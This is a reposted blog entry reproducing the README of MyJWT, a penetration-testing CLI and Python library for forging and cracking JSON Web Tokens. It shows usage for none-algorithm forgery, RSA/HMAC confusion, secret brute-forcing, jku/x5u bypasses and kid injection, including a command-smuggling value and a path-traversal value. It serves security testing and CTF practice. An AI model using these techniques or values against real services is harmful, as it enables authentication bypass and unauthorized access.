![]()
MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)
2021-01-17 20:30:00
Author: www.blogger.com(查看原文)
阅读量:162
收藏
tag:blogger.com,1999:blog-8317222231133660547.post-66333421616317918132021-01-17T08:30:00.023-03:002021-01-17T08:30:03.143-03:00MyJWT - A Cli For Cracking, Testing Vulnerabilities On Json Web Token (JWT)<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/s1000/jwt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="600" data-original-width="1000" height="384" src="https://1.bp.blogspot.com/-Slo-3BCqM04/X_u4XJ46ZII/AAAAAAAAU-s/yQRAPdLLQqUVjrTm60WJYHDw1jdqTu6dwCNcBGAsYHQ/w640-h384/jwt.jpg" width="640" /></a></div><p><br /></p> <p>This cli is for pentesters, CTF players, or dev.<br /> You can modify your jwt, sign, inject ,etc...<br /> Check <a href="http://myjwt.readthedocs.io" rel="nofollow" target="_blank" title="Documentation">Documentation</a> for more information.<br /> If you see problems or enhancement send an issue.I will respond as soon as possible. Enjoy :)</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Documentation</b></span><br /> <p>Documentation is available at <a href="http://myjwt.readthedocs.io" rel="nofollow" target="_blank" title="http://myjwt.readthedocs.io">http://myjwt.readthedocs.io</a></p> <br /><span style="font-size: x-large;"><b>Features</b></span><br /> <ul> <li>copy new jwt to clipboard</li> <li>user Interface (thanks <a href="https://github.com/tmbo/questionary" rel="nofollow" target="_blank" title="questionary">questionary</a>)</li> <li>color output</li> <li>modify jwt (header/Payload)</li> <li>None Vulnerability</li> <li>RSA/HMAC confusion</li> <li>Sign a jwt with key</li> <li>Brute Force to guess key</li> <li>crack jwt with regex to guess key</li> <li>kid injection</li> <li>Jku Bypass</li> <li>X5u Bypass</li> </ul> <br /><span style="font-size: x-large;"><b>Installation</b></span><br /> <p>To install myjwt, simply use pip:</p> <pre><code>pip install myjwt<br /></code></pre> <p>To run mywt from a docker image, run:</p> <pre><code>docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt<br /><br /># mount volume for wordlist<br />docker run -v $(pwd)/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt<br /># On Windows<br />docker run -v %CD%/wordlist:/home/wordlist/ -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt<br /></code></pre> <p>To install myjwt, on git:</p> <pre><code>git clone https://github.com/mBouamama/MyJWT.git<br />cd ./MyJWT<br />pip install -r requirements.txt<br />python MyJWT/myjwt_cli.py --help<br /></code></pre> <p>To install myjwt on BlackArch:</p> <pre><code>pacman -S myjwt</code></pre> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <div><pre><code>$ myjwt --help<br />Usage: myjwt [OPTIONS] JWT<br /><br /> This cli is for pentesters, CTF players, or dev.<br /> You can modify your jwt, sign, inject ,etc...<br /> Full documentation is at http://myjwt.readthedocs.io.<br /> If you see problems or enhancement send an issue.I will respond as soon as possible.<br /> Enjoy :)<br /> All new jwt will be copy to the clipboard.<br /><br />Options:<br /> --version Show the version and exit.<br /> --full-payload TEXT New <a href="https://www.kitploit.com/search/label/Payload" target="_blank" title="payload">payload</a> for your jwt.Json format Required.<br /> -h, --add-header TEXT Add a new key, value to your jwt header, if key<br /> is present old value will be replaced.Format:<br /> key=value.<br /><br /> -p, --add-payload TEXT Add a new key, value to your jwt payload, if<br /> key is present old value will be<br /> replaced.Format: key=value.<br /><br /> --sign TEXT Sign Your jwt with key given.<br /> --verify TEXT verify your key.<br /> -none, --none-vulnerability Check None Alg vulnerability.<br /> --hmac PATH Check RS/HMAC Alg vulnerability.<br /> --bruteforce PATH <a href="https://www.kitploit.com/search/label/Bruteforce" target="_blank" title="Bruteforce">Bruteforce</a> to guess the secret used to sign the<br /> token.<br /><br /> -c, --crack TEXT regex to iterate all string possibilities to<br /> guess the secret used to sign the token.<br /><br /> --kid TEXT Kid <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="Injection">Injection</a> sql<br /> --jku TEXT Jku Header to bypass authentication<br /> --x5u TEXT X5u Header to bypass authen tication<br /> --crt TEXT For x5cHeader, force crt file<br /> --key TEXT For jku or x5c Header, force private key to<br /> your key file<br /><br /> --file TEXT For jku Header and x5u Header, force file name<br /> --print Print Decoded JWT<br /> -u, --url TEXT Url to send your jwt.<br /> -m, --method TEXT Method use for send request to url.(Default<br /> GET).<br /><br /> -d, --data TEXT Data send to your url.Format: key=value. if<br /> value = MY_JWT value will be replace by new<br /> jwt.<br /><br /> -c, --cookies TEXT <a href="https://www.kitploit.com/search/label/Cookies" target="_blank" title="Cookies">Cookies</a> to send to your url.Format: key=value.<br /> if value = MY_JWT value will be replace by new<br /> jwt.<br /><br /> --help Show this message and exit.</code></pre></div> <br /><span style="font-size: large;"><b>Modify JWT</b></span><br /> <table> <tbody><tr> <th>Option</th> <th align="center">Type</th> <th align="center">Example</th> <th align="right">help</th> </tr> <tr> <td>--ful-payload</td> <td align="center">JSON</td> <td align="center">{"user": "admin"}</td> <td align="right">New payload for your jwt.</td> </tr> <tr> <td>-h, --add-header</td> <td align="center">key=value</td> <td align="center">user=admin</td> <td align="right">Add a new key, value to your jwt header, if key is present old value will be replaced.</td> </tr> <tr> <td>-p, --add-payload</td> <td align="center">key=value</td> <td align="center">user=admin</td> <td align="right">Add a new key, value to your jwt payload, if key is present old value will be replaced.</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Check Your JWT (HS alg)</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>help</th> </tr> <tr> <td>--sign</td> <td>text</td> <td>mysecretkey</td> <td>Sign Your jwt with your key</td> </tr> <tr> <td>--verify</td> <td>text</td> <td>mysecretkey</td> <td>Verify your key.</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Exploit</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>help</th> </tr> <tr> <td>-none, --none-vulnerability</td> <td>Nothing</td> <td></td> <td>Check None Alg vulnerability.</td> </tr> <tr> <td>--hmac</td> <td>PATH</td> <td>./public.pem</td> <td>Check RS/HMAC Alg vulnerability, and sign your jwt with public key.</td> </tr> <tr> <td>--bruteforce</td> <td>PATH</td> <td>./wordlist/big.txt</td> <td>Bruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line)</td> </tr> <tr> <td>--crack</td> <td>REGEX</td> <td>"[a-z]{4}"</td> <td>regex to iterate all string possibilities to guess the secret used to sign the token.</td> </tr> <tr> <td>--kid</td> <td>text</td> <td>"00; echo /etc/.passwd"</td> <td>Kid Injection sql</td> </tr> <tr> <td>--jku</td> <td>text</td> <td>MYPUBLICIP</td> <td>Jku Header to bypass authentication, use --file if you want to change your jwks file name, and --key if you want to use your own private pem</td> </tr> <tr> <td>--x5u</td> <td>text</td> <td>MYPUBLICIP</td> <td>For jku or x5c Header, use --file if you want to change your jwks file name, and --key if you want to use your own private pem</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Send your jwt</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>help</th> </tr> <tr> <td>-u, --url</td> <td>url</td> <td><a href="http://challenge01.root-me.org/web-serveur/ch59/admin" rel="nofollow" target="_blank" title="http://challenge01.root-me.org/web-serveur/ch59/admin">http://challenge01.root-me.org/web-serveur/ch59/admin</a></td> <td>Url to send your jwt.</td> </tr> <tr> <td>-m, --method</td> <td>text</td> <td>POST</td> <td>Method use to send request to url.(Default: GET).</td> </tr> <tr> <td>-d, --data</td> <td>key=value</td> <td>secret=MY_JWT</td> <td>Data send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt.</td> </tr> <tr> <td>-c, --cookies</td> <td>key=value</td> <td>secret=MY_JWT</td> <td>Cookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt.</td> </tr> </tbody></table> <br /><span style="font-size: large;"><b>Other</b></span><br /> <table> <tbody><tr> <th>Option</th> <th>Type</th> <th>Example</th> <th>help</th> </tr> <tr> <td>--crt</td> <td>PATH</td> <td>./public.crt</td> <td>For x5cHeader, force crt file</td> </tr> <tr> <td>--key</td> <td>PATH</td> <td>./private.pem</td> <td>For jku or x5c Header, force private key to your key file</td> </tr> <tr> <td>--file</td> <td>text</td> <td>myfile</td> <td>For jku Header, force file name without .json extension</td> </tr> <tr> <td>--print</td> <td>Nothing</td> <td></td> <td>Print Decoded JWT</td> </tr> <tr> <td>--help</td> <td>Nothing</td> <td></td> <td>Show Helper message and exit.</td> </tr> <tr> <td>--version</td> <td>Nothing</td> <td></td> <td>Show Myjwt version</td> </tr> </tbody></table> <br /><span style="font-size: x-large;"><b>Examples</b></span><br /> <ul> <li><a href="https://github.com/mBouamama/MyJWT#modify-your-jwt" rel="nofollow" target="_blank" title="Modify Your jwt">Modify Your jwt</a></li> <li><a href="https://github.com/mBouamama/MyJWT#none-vulnerability" rel="nofollow" target="_blank" title="None Vulnerabilty Check">None Vulnerabilty Check</a></li> <li><a href="https://github.com/mBouamama/MyJWT#sign-key" rel="nofollow" target="_blank" title="Sign Key">Sign Key</a></li> <li><a href="https://github.com/mBouamama/MyJWT#brute-force" rel="nofollow" target="_blank" title="Brute Force Signature">Brute Force Signature</a></li> <li><a href="https://github.com/mBouamama/MyJWT#rsahmac-confusion" rel="nofollow" target="_blank" title="RSA/HMAC Confusion">RSA/HMAC Confusion</a></li> <li><a href="https://github.com/mBouamama/MyJWT#kid-injection" rel="nofollow" target="_blank" title="Kid Injection">Kid Injection</a></li> <li><a href="https://github.com/mBouamama/MyJWT#send-your-new-jwt-to-url" rel="nofollow" target="_blank" title="Send your new Jwt to url">Send your new Jwt to url</a></li> <li><a href="https://github.com/mBouamama/MyJWT#jku-vulnerability" rel="nofollow" target="_blank" title="Jku Vulnerability">Jku Vulnerability</a></li> <li><a href="https://github.com/mBouamama/MyJWT#x5u-vulnerability" rel="nofollow" target="_blank" title="X5u Vulnerability">X5u Vulnerability</a></li> </ul> <br /><span style="font-size: large;"><b>Modify your Jwt</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.modify_jwt import add_header, change_payload<br />from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt<br /><br />jwt_json = jwt_to_json(jwt)<br />jwt_json = add_header(jwt_json, {"kid": "001"})<br />jwt_json = change_payload(jwt_json, {"username": "admin"})<br />jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/01-modify-jwt/modify-jwt.py" rel="nofollow" target="_blank" title="01-modify-jwt">01-modify-jwt</a></p> <br /><span style="font-size: large;"><b>None Vulnerability</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --none-vulnerability<br /></code></pre> <br /><b>CODE</b><br /> <pre><code>from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt<br />from myjwt.vulnerabilities import none_vulnerability<br />jwt_json = jwt_to_json(jwt)<br />jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/02-none-vulnerability/none-vulnerability.py" rel="nofollow" target="_blank" title="02-none-vulnerability">02-none-vulnerability</a></p> <br /><span style="font-size: large;"><b>Sign Key</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --sign YOUR_KEY<br /></code></pre> <br /><b>CODE</b><br /> <pre><code>from myjwt.modify_jwt import signature<br />from myjwt.utils import jwt_to_json<br />key = "test"<br />jwt = signature(jwt_to_json(jwt), key)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/03-sign-key/sign-key.py" rel="nofollow" target="_blank" title="03-sign-key">03-sign-key</a></p> <br /><span style="font-size: large;"><b>Brute Force</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --bruteforce PATH<br /></code></pre> <br /><b>CODE</b><br /> <pre><code>from myjwt.vulnerabilities import bruteforce_wordlist<br />wordlist = "../../wordlist/common_pass.txt"<br />key = bruteforce_wordlist(jwt, wordlist)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/04-brute-force/brute-force.py" rel="nofollow" target="_blank" title="04-brute-force">04-brute-force</a></p> <br /><span style="font-size: large;"><b>Crack</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --crack REGEX<br /></code></pre> <br /><span style="font-size: large;"><b>RSA/HMAC Confusion</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --hmac FILE<br /></code></pre> <br /><b>CODE</b><br /> <pre><code>from myjwt.vulnerabilities import confusion_rsa_hmac<br />file = "public.pem"<br />jwt = confusion_rsa_hmac(jwt, file)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/05-rsa-hmac-confusion/rsa-hmac-confusion.py" rel="nofollow" target="_blank" title="05-rsa-hmac-confusion">05-rsa-hmac-confusion</a></p> <br /><span style="font-size: large;"><b>Kid Injection</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --kid INJECTION<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.modify_jwt import signature<br />from myjwt.utils import jwt_to_json<br />from myjwt.vulnerabilities import inject_sql_kid<br /><br />injection = "../../../../../../dev/null"<br />sign = ""<br />jwt = inject_sql_kid(jwt, injection)<br />jwt = signature(jwt_to_json(jwt), sign)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/06-kid-injection/kid-injection.py" rel="nofollow" target="_blank" title="06-kid-injection">06-kid-injection</a></p> <br /><span style="font-size: large;"><b>Send your new Jwt to url</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"<br /></code></pre> <br /><span style="font-size: large;"><b>Jku Vulnerability</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --jku YOUR_URL<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.vulnerabilities import jku_vulnerability<br />new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")<br />print(jwt)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/07-jku-bypass/jku-bypass.py" rel="nofollow" target="_blank" title="07-jku-bypass">07-jku-bypass</a></p> <br /><span style="font-size: large;"><b>X5U Vulnerability</b></span><br /> <br /><b>CLI</b><br /> <pre><code>myjwt YOUR_JWT --x5u YOUR_URL<br /></code></pre> <br /><b>Code</b><br /> <pre><code>from myjwt.vulnerabilities import x5u_vulnerability<br />newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")<br />print(jwt)<br /></code></pre> <p>Full example here: <a href="https://github.com/mBouamama/MyJWT/blob/master/examples/08-x5u-bypass/x5u-bypass.py" rel="nofollow" target="_blank" title="08-x5u-bypass">08-x5u-bypass</a></p> <br /><span style="font-size: x-large;"><b>Download</b></span><br /> <p>Check github releases. Latest is available at <a href="https://github.com/mBouamama/MyJWT/releases/latest" rel="nofollow" target="_blank" title="https://github.com/mBouamama/MyJWT/releases/latest">https://github.com/mBouamama/MyJWT/releases/latest</a></p> <br /><span style="font-size: x-large;"><b>Contribute</b></span><br /> <ul> <li>Fork this repository or clone it</li> <li>Create a new branch (feature, hotfix, etc...)</li> <li>Make necessary changes and commit those changes</li> <li>Check lint with <code>make flake8</code></li> <li>Check unit_test with <code>make test</code></li> <li>Send Pull Request I will check as Soon as Possible.</li> </ul> <br /><span style="font-size: x-large;"><b>Change log</b></span><br /> <p>The log's become rather long. It moved to its own file.</p> <p>See <a href="https://github.com/mBouamama/MyJWT/blob/master/CHANGELOG.md" rel="nofollow" target="_blank" title="CHANGES">CHANGES</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/mBouamama/MyJWT" rel="nofollow" target="_blank" title="Download MyJWT">Download MyJWT</a></span></b></div>Zion3R[email protected]
文章来源: http://www.blogger.com/feeds/8317222231133660547/posts/default/6633342161631791813
如有侵权请联系:admin#unsafe.sh